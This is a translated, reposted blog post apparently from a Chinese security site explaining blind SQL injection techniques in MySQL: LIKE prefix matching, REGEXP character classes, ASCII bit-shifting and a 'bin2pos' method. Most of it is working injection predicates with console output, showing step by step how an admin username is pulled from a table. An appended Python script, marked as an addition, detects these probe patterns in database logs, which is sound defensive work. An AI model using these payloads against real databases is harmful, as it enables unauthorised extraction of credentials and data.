Blind SQLi Methods Explored

Reposted from: http://laterain.sinaapp.com/?p=196
-> Exploring blind injection methods
 
1. Binary search
Not much to say about this one; everyone knows it. The 啊D injection tool uses this method.
Speed: log2(N)
 
 
 
2. Fuzzy matching (LIKE)
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'a%';
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adn%';
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adm%';
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'admin';
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> name = admin
 
 
 
3. Regex matching (REGEXP)
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[0-9]' ;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-z]' ;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-h]' ;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-a]' ;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
======> name[0] = a
 
 
 
4. Bit-shift method
a (decimal) = 97
a (binary) = 01100001
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>7)=0;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 7 bits becomes 00000000
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=0;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>6)=1;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 6 bits becomes 00000001
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=2;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>5)=3;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 5 bits becomes 00000011
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=6;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=7;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 4 bits becomes 00000110
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=12;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>3)=13;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 3 bits becomes 00001100
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=24;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>2)=25;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 2 bits becomes 00011000
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>1)=48;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>1)=49;
Empty set (0.00 sec)
 
====> 01100001 shifted right by 1 bit becomes 00110000
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=96;
Empty set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>0)=97;
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 01100001 shifted right by 0 bits stays 01100001
====> name[0] = a
Speed: fixed at 7 steps
 
 
 
5. bin2pos
The methods above are all easy to understand, and most people already know them. This last one I only came across today. It is rather unusual, and I don't know how to translate its name... I'm also not sure my understanding matches the author's.
I'll explain it the way I think of it.
 
The statement the author gave:
IF((@a:=MID(BIN(POSITION(MID((SELECT password FROM users WHERE id=2 LIMIT 1),1,1)IN(CHAR(48,49,50,51,52,53,54,55,56,57,65,66,67,68,69,70))),1,1))!=space(0),2-@a,0/0)
 
My tidied-up version:
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno")),1,1),@i,0);
locate and position are functionally similar, so I used locate.
(select name from ylmf_admin_user limit 1) is our core query.
Then mid((select name from ylmf_admin_user limit 1),1,1) extracts the 1st character of the query result.
Then locate(mid((select name from ylmf_admin_user limit 1),1,1),"abcdefghijklmno") maps that character onto the string abcdefghijklmno and returns its position in it; for example, a is 1.
Then bin() converts the position to binary.
Then mid() extracts one digit of that binary string.
Then the digit is assigned to @i.
Finally the if(expr, res1, res2) statement decides the outcome; I set res1 to @i because @i can only be 0 or 1.
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>0,1,0);
 
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> mid((select name from ylmf_admin_user limit 1),2,1) returned data
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>2,1,0);
 
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=length(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")))>3,1,0);
 
Empty set (0.00 sec)
 
====> the bin result has 3 digits
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),1,1),@i,0);
 
+-------------------------+
| site_url                |
+-------------------------+
| http://union.114la.com/ |
+-------------------------+
1 row in set (0.00 sec)
 
====> 1st digit of the bin result is 1
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),2,1),@i,0);
 
Empty set (0.00 sec)
 
====> 2nd digit of the bin result is 0
 
mysql> select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),3,1),@i,0);
 
Empty set (0.00 sec)
 
====> 3rd digit of the bin result is 0 ====> the bin result is 100, i.e. d
Why did I map onto abcdefghijklmno? Because abcdefghijklmno has length 15 and bin(15)=1111, which keeps the bin result short and saves the time spent measuring its length. If mid((select name from ylmf_admin_user limit 1),2,1) yields no data and you have confirmed the statement itself is correct, replace abcdefghijklmno with a different alphabet, e.g. ABCDEFGHIJKLMNO.
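A defender-side view of the probes in sections 2 to 5, added here as an example and not part of the original post: a small Python scanner that reads a constructed, simplified MySQL general-log sample and counts, per connection id, which of the four extraction patterns (LIKE prefix, REGEXP class, ASCII bit shift, bin2pos) each statement matches. The log line format and the signature regexes are assumptions made for this example.

```python
import re
from collections import Counter, defaultdict

# Heuristic signatures for the four extraction styles in this post (LIKE prefix,
# REGEXP class, bit shift, bin2pos). Constructed for this example, not vendor rules.
SIGNATURES = {
    "like_prefix":  re.compile(r"\bLIKE\s+'[^']*%'", re.I),
    "regexp_class": re.compile(r"\bREGEXP\s+'\^\[", re.I),
    "bit_shift":    re.compile(r"\bASCII\s*\(\s*MID\s*\(.*?\)\s*>>\s*\d", re.I),
    "bin2pos":      re.compile(r"\bBIN\s*\(\s*(?:LOCATE|POSITION)\s*\(", re.I),
}
SUBQUERY = re.compile(r"\(\s*SELECT\b", re.I)
# Assumed simplified general-log line: <timestamp> <connection id> Query <statement>
LOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+Query\s+(.+)$")

# Constructed sample log (not real traffic); lines 2-5 mirror the post's probes,
# line 6 is a harmless prefix search on connection 43.
SAMPLE_LOG = """\
2024-01-01T10:00:01 42 Query select site_url from ylmf_links where id=40
2024-01-01T10:00:02 42 Query select site_url from ylmf_links where id=40 and (select name from ylmf_admin_user limit 1) LIKE 'adm%'
2024-01-01T10:00:03 42 Query select site_url from ylmf_links where id=40 and MID((select name from ylmf_admin_user limit 1),1,1) REGEXP '^[a-h]'
2024-01-01T10:00:04 42 Query select site_url from ylmf_links where id=40 and (ASCII(MID((select name from ylmf_admin_user limit 1),1,1))>>4)=6
2024-01-01T10:00:05 42 Query select site_url from ylmf_links where id=40 and if(@i:=mid(bin(locate(mid((select name from ylmf_admin_user limit 1),2,1),"abcdefghijklmno")),1,1),@i,0)
2024-01-01T10:00:06 43 Query select title from ylmf_links where title LIKE 'news%'
"""

def classify(query):
    """Names of the signatures one statement matches. LIKE/REGEXP hits count only
    when a subquery is in the predicate, so an ordinary search such as
    title LIKE 'news%' is not flagged."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(query)]
    if not SUBQUERY.search(query):
        hits = [h for h in hits if h in ("bit_shift", "bin2pos")]
    return hits

def scan_log(text):
    """Map connection id -> Counter of matched signatures; clean connections are omitted."""
    per_conn = defaultdict(Counter)
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        _ts, conn, stmt = m.groups()
        for name in classify(stmt):
            per_conn[conn][name] += 1
    return {conn: counts for conn, counts in per_conn.items() if counts}

if __name__ == "__main__":
    for conn, counts in scan_log(SAMPLE_LOG).items():
        print(f"connection {conn}: {dict(counts)}")
```

A single connection that cycles through several of these probe shapes against the same base query is the signal worth alerting on; one LIKE with a wildcard on its own is not.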
